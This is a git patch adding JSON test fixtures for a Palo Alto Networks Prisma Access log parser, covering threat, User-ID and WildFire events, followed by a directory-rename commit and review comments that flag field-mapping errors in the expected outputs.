+ "hostname": "xxxxx", + "logger": "threat" + }, + "network": { + "application": "maxdb", + "transport": "tcp" + }, + "observer": { + "egress": { + "interface": { + "alias": "untrust", + "id": "2", + "name": "ethernet1/2" + } + }, + "ingress": { + "interface": { + "alias": "ethernet4Zone-test4", + "id": "2", + "name": "n" + } + }, + "product": "PAN-OS", + "type": "LF", + "vendor": "Palo Alto Networks", + "version": "2.0" + }, + "paloalto": { + "DirectionOfAttack": "server to client", + "PanOSContainerName": "pan-dp-77754f4", + "PanOSContainerNameSpace": "pns_default", + 
"PanOSDestinationDeviceCategory": "L-Phone", + "PanOSDestinationDeviceHost": "pan-506", + "PanOSDestinationDeviceMac": "150083646537", + "PanOSDestinationDeviceModel": "Note XT", + "PanOSDestinationDeviceOSFamily": "K8", + "PanOSDestinationDeviceOSVersion": "Android v8", + "PanOSDestinationDeviceProfile": "l-profile", + "PanOSDestinationDeviceVendor": "Lenovo", + "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx", + "PanOSSourceDeviceHost": "pan-505", + "PanOSSourceDeviceModel": "Note 4G", + "PanOSSourceDeviceProfile": "l-profile", + "PanOSSourceDeviceVendor": "Lenovo", + "PanOSSourceDynamicAddressGroup": "blue_dag", + "PanOSSourceLocation": "west-coast", + "URLCategory": "sports", + "VirtualLocation": "vsys1", + "endpoint": { + "serial_number": "xxxxxxxxxxxxxx" + } + }, + "related": { + "hosts": [ + "xxxxx" + ], + "ip": [ + "1.1.1.1" + ], + "user": [ + "xxxxx o\"'\"test", + "xxxxx xxxxx" + ] + }, + "rule": { + "name": "allow-business-apps", + "uuid": "ec14df0b-c845-4435-87a2-d207730f5ae8" + }, + "source": { + "address": "1.1.1.1", + "ip": "1.1.1.1", + "nat": { + "ip": "1.1.1.1", + "port": 26236 + }, + "port": 32350, + "user": { + "name": "xxxxx xxxxx" + } + }, + "user": { + "name": "xxxxx xxxxx" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/userid_cef.json b/Palo Alto Networks/paloalto-prima-access/tests/userid_cef.json new file mode 100644 index 000000000..c90ab6ed6 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/userid_cef.json 
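Review bot: The expected `observer.ingress.interface` block (`"alias": "ethernet4Zone-test4", "id": "2", "name": "n"`) does not correspond to the input, where `deviceInboundInterface=unknown` and `PanOSInboundInterfaceDetailsPort=0`: `"n"` looks like a fragment of `unknown`, and `"2"` matches the outbound side (`ethernet1/2`, `PanOSOutboundInterfaceDetailsPort=2`), so the fixture appears to freeze a parser artifact rather than an intended mapping. The same `"name": "n"` shows up in the ingress block of the fixture that precedes this one on the page. For an `unknown` inbound interface I would expect the ingress entry to carry only `alias`, with `id`/`name` omitted; if the split is intentional, it deserves a sentence in the parser documentation.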
@@ -0,0 +1,77 @@ +{ + "input": { + "message": "CEF:0|Palo Alto Networks|LF|2.0|USERID|logout|3|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 21:06:02 deviceExternalId=xxxxxxxxxxxxx PanOSConfigVersion= dntdom=paloaltonetwork duser=xxxxx duid= PanOSCortexDataLakeTenantID=xxxxxxxxxxxxx PanOSIsDuplicateLog=false PanOSIsDuplicateUser= PanOSIsPrismaNetworks=false PanOSIsPrismaUsers=false PanOSLogExported=false PanOSLogForwarded=true PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSUserGroupFound= start=Mar 01 2021 21:06:02 cs3=vsys1 cs3Label=VirtualLocation src=1.1.1.1 dst=1.1.1.1 duser0=paloaltonetworks\\\\xxxxx cs4=fake-data-source-169 cs4Label=MappingDataSourceName cat=0 cnt=1 cn3=3531 cn3Label=MappingTimeout spt=21015 dpt=49760 cs5=probing cs5Label=MappingDataSource cs6=netbios_probing cs6Label=MappingDataSourceType externalId=xxxxxxxxxxxxx PanOSDGHierarchyLevel1=12 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=PA-5220 cn2=1 cn2Label=VirtualSystemID cs1=xxxxx cs1Label=MFAFactorType end=Jul 09 2019 18:15:44 cn1=3 cn1Label=AuthFactorNo PanOSUGFlags=0x100 PanOSUserIdentifiedBySource=xxxxxxxxxxxxxx PanOSTag= PanOSTimeGeneratedHighResolution=Jul 25 2019 23:30:12" + }, + "expected": { + "message": "CEF:0|Palo Alto Networks|LF|2.0|USERID|logout|3|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 21:06:02 deviceExternalId=xxxxxxxxxxxxx PanOSConfigVersion= dntdom=paloaltonetwork duser=xxxxx duid= PanOSCortexDataLakeTenantID=xxxxxxxxxxxxx PanOSIsDuplicateLog=false PanOSIsDuplicateUser= PanOSIsPrismaNetworks=false PanOSIsPrismaUsers=false PanOSLogExported=false PanOSLogForwarded=true PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSUserGroupFound= start=Mar 01 2021 21:06:02 cs3=vsys1 cs3Label=VirtualLocation src=1.1.1.1 dst=1.1.1.1 duser0=paloaltonetworks\\\\xxxxx cs4=fake-data-source-169 cs4Label=MappingDataSourceName cat=0 cnt=1 cn3=3531 cn3Label=MappingTimeout spt=21015 dpt=49760 cs5=probing 
cs5Label=MappingDataSource cs6=netbios_probing cs6Label=MappingDataSourceType externalId=xxxxxxxxxxxxx PanOSDGHierarchyLevel1=12 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=PA-5220 cn2=1 cn2Label=VirtualSystemID cs1=xxxxx cs1Label=MFAFactorType end=Jul 09 2019 18:15:44 cn1=3 cn1Label=AuthFactorNo PanOSUGFlags=0x100 PanOSUserIdentifiedBySource=xxxxxxxxxxxxxx PanOSTag= PanOSTimeGeneratedHighResolution=Jul 25 2019 23:30:12", + "event": { + "category": [ + "authentication" + ], + "dataset": "userid", + "severity": 3, + "start": "2021-03-01T21:06:02Z", + "timezone": "UTC", + "type": [ + "end" + ] + }, + "@timestamp": "2021-03-01T21:06:02Z", + "action": { + "type": "logout" + }, + "destination": { + "address": "1.1.1.1", + "ip": "1.1.1.1", + "port": 49760, + "user": { + "name": "xxxxx" + } + }, + "host": { + "hostname": "PA-5220", + "id": "xxxxxxxxxxxxx", + "name": "PA-5220" + }, + "log": { + "hostname": "PA-5220", + "logger": "userid" + }, + "observer": { + "egress": { + "interface": { + "alias": "probing" + } + }, + "ingress": { + "interface": { + "alias": "fake-data-source-169" + } + }, + "product": "PAN-OS", + "type": "LF", + "vendor": "Palo Alto Networks", + "version": "2.0" + }, + "paloalto": { + "VirtualLocation": "vsys1", + "VirtualSystemID": "1" + }, + "related": { + "hosts": [ + "PA-5220" + ], + "ip": [ + "1.1.1.1" + ], + "user": [ + "xxxxx" + ] + }, + "source": { + "address": "1.1.1.1", + "ip": "1.1.1.1", + "port": 21015 + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/wildfire1_json.json b/Palo Alto Networks/paloalto-prima-access/tests/wildfire1_json.json new file mode 100644 index 000000000..edd76521b --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/wildfire1_json.json 
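Review bot: The expected `observer.ingress.interface.alias` `"fake-data-source-169"` and `observer.egress.interface.alias` `"probing"` are the input's `cs4` and `cs5` values, whose labels here are `MappingDataSourceName` and `MappingDataSource` rather than `FromZone`/`ToZone` as in the url fixture; for USERID logs these are User-ID mapping data sources, so the expectation pins zone/interface fields that describe nothing of the kind. The fixture should instead expect them under `paloalto.MappingDataSourceName` / `paloalto.MappingDataSource`, the way `cs3` and `cn2` land in `paloalto.VirtualLocation` / `paloalto.VirtualSystemID` in the same file, and drop the two `observer.*.interface.alias` entries; that presumably requires the parser to key custom-string fields on their `csNLabel` rather than on their slot.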
@@ -0,0 +1,111 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2023-05-30T06:54:42.000000Z\",\"DeviceSN\":\"111111111111\",\"LogType\":\"THREAT\",\"Subtype\":\"wildfire\",\"ConfigVersion\":\"10.1\",\"TimeGenerated\":\"2023-05-30T06:52:13.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"Normal Internet Access browser\",\"SourceUser\":\"john.doe@example.org\",\"DestinationUser\":null,\"Application\":\"web-browsing\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"Trust\",\"ToZone\":\"Untrust\",\"InboundInterface\":\"ethernet1/20\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Panorama_CDL\",\"SessionID\":444444,\"RepeatCount\":1,\"SourcePort\":55555,\"DestinationPort\":80,\"NATSourcePort\":40114,\"NATDestinationPort\":80,\"Protocol\":\"tcp\",\"Action\":\"block\",\"FileName\":\"mp3.exe\",\"ThreatID\":\"Windows Executable (EXE)(52020)\",\"VendorSeverity\":\"Informational\",\"DirectionOfAttack\":\"server to 
client\",\"SequenceNo\":7117268851537282868,\"SourceLocation\":\"10.0.0.0-10.255.255.255\",\"DestinationLocation\":\"CN\",\"PacketID\":0,\"FileHash\":\"adc83b19e793491b1c6ea0fd8b46cd9f32e592fc\",\"ApplianceOrCloud\":\"wildfire.paloaltonetworks.com\\u0000\",\"URLCounter\":1,\"FileType\":\"pe\",\"SenderEmail\":null,\"EmailSubject\":null,\"RecipientEmail\":null,\"ReportID\":33333333333,\"DGHierarchyLevel1\":997,\"DGHierarchyLevel2\":738,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"MyDevice\",\"SourceUUID\":null,\"DestinationUUID\":null,\"IMSI\":0,\"IMEI\":null,\"ParentSessionID\":0,\"ParentStarttime\":\"1970-01-01T00:00:00.000000Z\",\"Tunnel\":\"N/A\",\"ThreatCategory\":\"unknown\",\"ContentVersion\":\"0\",\"SigFlags\":\"0x0\",\"RuleUUID\":\"50afdf91-0d37-4729-8052-1382912d9895\",\"HTTP2Connection\":0,\"DynamicUserGroupName\":null,\"X-Forwarded-ForIP\":null,\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"HostID\":null,\"EndpointSerialNumber\":\"xxxxxxxxxxx\",\"DomainEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"PartialHash\":0,\"TimeGeneratedHighResolution\":\"2023-05-30T06:52:14.052000Z\",\"NSSAINetworkSliceType\":null}\n" + }, + "expected": { + "message": 
"{\"TimeReceived\":\"2023-05-30T06:54:42.000000Z\",\"DeviceSN\":\"111111111111\",\"LogType\":\"THREAT\",\"Subtype\":\"wildfire\",\"ConfigVersion\":\"10.1\",\"TimeGenerated\":\"2023-05-30T06:52:13.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"Normal Internet Access browser\",\"SourceUser\":\"john.doe@example.org\",\"DestinationUser\":null,\"Application\":\"web-browsing\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"Trust\",\"ToZone\":\"Untrust\",\"InboundInterface\":\"ethernet1/20\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Panorama_CDL\",\"SessionID\":444444,\"RepeatCount\":1,\"SourcePort\":55555,\"DestinationPort\":80,\"NATSourcePort\":40114,\"NATDestinationPort\":80,\"Protocol\":\"tcp\",\"Action\":\"block\",\"FileName\":\"mp3.exe\",\"ThreatID\":\"Windows Executable (EXE)(52020)\",\"VendorSeverity\":\"Informational\",\"DirectionOfAttack\":\"server to client\",\"SequenceNo\":7117268851537282868,\"SourceLocation\":\"10.0.0.0-10.255.255.255\",\"DestinationLocation\":\"CN\",\"PacketID\":0,\"FileHash\":\"adc83b19e793491b1c6ea0fd8b46cd9f32e592fc\",\"ApplianceOrCloud\":\"wildfire.paloaltonetworks.com\\u0000\",\"URLCounter\":1,\"FileType\":\"pe\",\"SenderEmail\":null,\"EmailSubject\":null,\"RecipientEmail\":null,\"ReportID\":33333333333,\"DGHierarchyLevel1\":997,\"DGHierarchyLevel2\":738,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"MyDevice\",\"SourceUUID\":null,\"DestinationUUID\":null,\"IMSI\":0,\"IMEI\":null,\"ParentSessionID\":0,\"ParentStarttime\":\"1970-01-01T00:00:00.000000Z\",\"Tunnel\":\"N/A\",\"ThreatCategory\":\"unknown\",\"ContentVersion\":\"0\",\"SigFlags\":\"0x0\",\"RuleUUID\":\"50afdf91-0d37-4729-8052-1382912d9895\",\"HTTP2Connection\":0,\"DynamicUserGroupName\":null,\"X-Forwarded-ForIP\":null,\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":nul
l,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"HostID\":null,\"EndpointSerialNumber\":\"xxxxxxxxxxx\",\"DomainEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"PartialHash\":0,\"TimeGeneratedHighResolution\":\"2023-05-30T06:52:14.052000Z\",\"NSSAINetworkSliceType\":null}\n", + "event": { + "action": "block", + "category": [ + "malware" + ], + "dataset": "threat", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2023-05-30T06:52:13Z", + "action": { + "name": "block", + "outcome": "success", + "type": "wildfire" + }, + "destination": { + "address": "5.6.7.8", + "geo": { + "country_iso_code": "CN" + }, + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 80 + }, + "port": 80 + }, + "file": { + "name": "mp3.exe" + }, + "log": { + "hostname": "MyDevice", + "level": "Informational", + "logger": "threat" + }, + "network": { + "application": "web-browsing" + }, + "observer": { + "egress": { + "interface": { + "alias": "Untrust" + } + }, + "ingress": { + "interface": { + "alias": "Trust" + } + }, + "name": "MyDevice", + "product": "PAN-OS", + "serial_number": "111111111111" + }, + "paloalto": { + "DGHierarchyLevel1": "997", + "DGHierarchyLevel2": "738", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "DirectionOfAttack": "server to client", + "Threat_ContentType": "wildfire", + "VirtualLocation": "vsys1", + "endpoint": { + "serial_number": "xxxxxxxxxxx" + }, + "threat": { + "id": "Windows Executable (EXE)(52020)" + } + }, + "related": { + "ip": [ + 
"1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "example.org", + "john.doe@example.org" + ] + }, + "rule": { + "name": "Normal Internet Access browser", + "uuid": "50afdf91-0d37-4729-8052-1382912d9895" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 40114 + }, + "port": 55555, + "user": { + "name": "john.doe@example.org" + } + }, + "user": { + "domain": "john.doe", + "email": "john.doe@example.org", + "name": "example.org" + } + } +} \ No newline at end of file From fd4ff900b367b4041ccf800d643be8e56e755b75 Mon Sep 17 00:00:00 2001 
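Review bot: The expected `user` object swaps the two halves of `SourceUser`: `"john.doe@example.org"` becomes `"name": "example.org"` and `"domain": "john.doe"`, and `related.user` accordingly lists `"example.org"` as a user. For a `user@domain` identity the expectation should be `"name": "john.doe"`, `"domain": "example.org"`, with `related.user` holding `john.doe` and the full address; the split in the parser presumably only handles the `DOMAIN\user` form correctly. Separately, the 40-hex `FileHash` `adc83b19e793491b1c6ea0fd8b46cd9f32e592fc` in the input appears nowhere in the expected output (no `file.hash.sha1`), which is worth confirming is intentional, since the hash is the natural pivot for a WildFire verdict.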
From: Sebastien Quioc Date: Wed, 16 Oct 2024 11:06:29 +0200 Subject: [PATCH 154/317] fix(PaloAlto): fix directory name --- .../CHANGELOG.md | 0 .../README.md | 0 .../_meta/fields.yml | 0 .../_meta/logo.png | Bin .../_meta/manifest.yml | 0 .../_meta/smart-descriptions.json | 0 .../ingest/parser.yml | 0 .../tests/User_id_1_csv.json | 0 .../tests/User_id_2_csv.json | 0 .../tests/auth_cef.json | 0 .../tests/decryption_cef.json | 0 .../tests/file_cef.json | 0 .../tests/fix_bug_with_int.json | 0 .../tests/fix_bug_without_int.json | 0 .../tests/globalprotect_cef.json | 0 .../tests/globalprotect_csv.json | 0 .../tests/globalprotect_csv_2.json | 0 .../tests/hip_match_cef.json | 0 .../tests/icmp_allow_csv.json | 0 .../tests/iptag_cef.json | 0 .../tests/network_threat_alert_1.json | 0 .../tests/network_threat_alert_2.json | 0 .../tests/sctp_cef.json | 0 .../tests/system_csv.json | 0 .../tests/tcp_allow_csv.json | 0 .../tests/test_cloud_election_json.json | 0 .../tests/test_dhcp_renew_json.json | 0 .../tests/test_dns_proxy_json.json | 0 .../tests/test_dns_response.json | 0 .../tests/test_file_alert_json.json | 0 .../tests/test_globalprotect.json | 0 .../tests/test_installed_package_json.json | 0 .../tests/test_ldap_brute_force.json | 0 .../tests/test_new_file_type.json | 0 .../tests/test_new_globalprotect.json | 0 .../tests/test_new_threat_type.json | 0 .../tests/test_new_url_type.json | 0 .../tests/test_ntp_sync_json.json | 0 .../tests/test_port_up_json.json | 0 .../tests/test_registration_succeed_json.json | 0 .../tests/test_system.json | 0 .../tests/test_system_event_10_json.json | 0 .../tests/test_system_event_11_json.json | 0 .../tests/test_system_event_12_json.json | 0 .../tests/test_system_event_1_json.json | 0 .../tests/test_system_event_2_json.json | 0 .../tests/test_system_event_3_json.json | 0 .../tests/test_system_event_4_json.json | 0 .../tests/test_system_event_5_json.json | 0 .../tests/test_system_event_6_json.json | 0 .../tests/test_system_event_7_json.json | 0 
.../tests/test_system_event_8_json.json | 0 .../tests/test_system_event_9_json.json | 0 .../tests/test_threat.json | 0 .../tests/test_threat_02.json | 0 .../tests/test_timestamp_palo.json | 0 .../tests/test_traffic_event_1_json.json | 0 .../tests/test_traffic_event_2_json.json | 0 .../tests/test_update_content_json.json | 0 .../tests/test_upgrade_package_json.json | 0 .../tests/test_user_authentication_json.json | 0 .../tests/test_userid.json | 0 .../tests/test_web_authentication_json.json | 0 .../tests/test_wildfire_failure_json.json | 0 .../tests/threat-url-xff.json | 0 .../tests/threat_cef.json | 0 .../tests/threat_csv.json | 0 .../tests/traffic1_csv.json | 0 .../tests/traffic2_csv.json | 0 .../tests/traffic_cef.json | 0 .../tests/traffic_with_resotimestamp.json | 0 .../tests/udp_deny_csv.json | 0 .../tests/url_cef.json | 0 .../tests/userid_cef.json | 0 .../tests/wildfire1_json.json | 0 75 files changed, 0 insertions(+), 0 deletions(-) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/CHANGELOG.md (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/README.md (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/_meta/fields.yml (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/_meta/logo.png (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/_meta/manifest.yml (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/_meta/smart-descriptions.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/ingest/parser.yml (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/User_id_1_csv.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/User_id_2_csv.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/auth_cef.json (100%) rename Palo Alto 
Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/decryption_cef.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/file_cef.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/fix_bug_with_int.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/fix_bug_without_int.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/globalprotect_cef.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/globalprotect_csv.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/globalprotect_csv_2.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/hip_match_cef.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/icmp_allow_csv.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/iptag_cef.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/network_threat_alert_1.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/network_threat_alert_2.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/sctp_cef.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/system_csv.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/tcp_allow_csv.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_cloud_election_json.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_dhcp_renew_json.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_dns_proxy_json.json (100%) rename Palo Alto 
Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_dns_response.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_file_alert_json.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_globalprotect.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_installed_package_json.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_ldap_brute_force.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_new_file_type.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_new_globalprotect.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_new_threat_type.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_new_url_type.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_ntp_sync_json.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_port_up_json.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_registration_succeed_json.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_system.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_system_event_10_json.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_system_event_11_json.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_system_event_12_json.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_system_event_1_json.json (100%) rename Palo Alto 
Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_system_event_2_json.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_system_event_3_json.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_system_event_4_json.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_system_event_5_json.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_system_event_6_json.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_system_event_7_json.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_system_event_8_json.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_system_event_9_json.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_threat.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_threat_02.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_timestamp_palo.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_traffic_event_1_json.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_traffic_event_2_json.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_update_content_json.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_upgrade_package_json.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_user_authentication_json.json (100%) rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_userid.json (100%) rename Palo Alto 
Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_web_authentication_json.json (100%)
rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/test_wildfire_failure_json.json (100%)
rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/threat-url-xff.json (100%)
rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/threat_cef.json (100%)
rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/threat_csv.json (100%)
rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/traffic1_csv.json (100%)
rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/traffic2_csv.json (100%)
rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/traffic_cef.json (100%)
rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/traffic_with_resotimestamp.json (100%)
rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/udp_deny_csv.json (100%)
rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/url_cef.json (100%)
rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/userid_cef.json (100%)
rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/wildfire1_json.json (100%)
diff --git a/Palo Alto Networks/paloalto-prima-access/CHANGELOG.md b/Palo Alto Networks/paloalto-prisma-access/CHANGELOG.md
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/CHANGELOG.md
rename to Palo Alto Networks/paloalto-prisma-access/CHANGELOG.md
diff --git a/Palo Alto Networks/paloalto-prima-access/README.md b/Palo Alto Networks/paloalto-prisma-access/README.md
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/README.md
rename to Palo Alto Networks/paloalto-prisma-access/README.md
diff --git a/Palo Alto Networks/paloalto-prima-access/_meta/fields.yml b/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/_meta/fields.yml
rename to Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml
diff --git a/Palo Alto Networks/paloalto-prima-access/_meta/logo.png b/Palo Alto Networks/paloalto-prisma-access/_meta/logo.png
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/_meta/logo.png
rename to Palo Alto Networks/paloalto-prisma-access/_meta/logo.png
diff --git a/Palo Alto Networks/paloalto-prima-access/_meta/manifest.yml b/Palo Alto Networks/paloalto-prisma-access/_meta/manifest.yml
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/_meta/manifest.yml
rename to Palo Alto Networks/paloalto-prisma-access/_meta/manifest.yml
diff --git a/Palo Alto Networks/paloalto-prima-access/_meta/smart-descriptions.json b/Palo Alto Networks/paloalto-prisma-access/_meta/smart-descriptions.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/_meta/smart-descriptions.json
rename to Palo Alto Networks/paloalto-prisma-access/_meta/smart-descriptions.json
diff --git a/Palo Alto Networks/paloalto-prima-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/ingest/parser.yml
rename to Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/User_id_1_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/User_id_1_csv.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/User_id_1_csv.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/User_id_1_csv.json
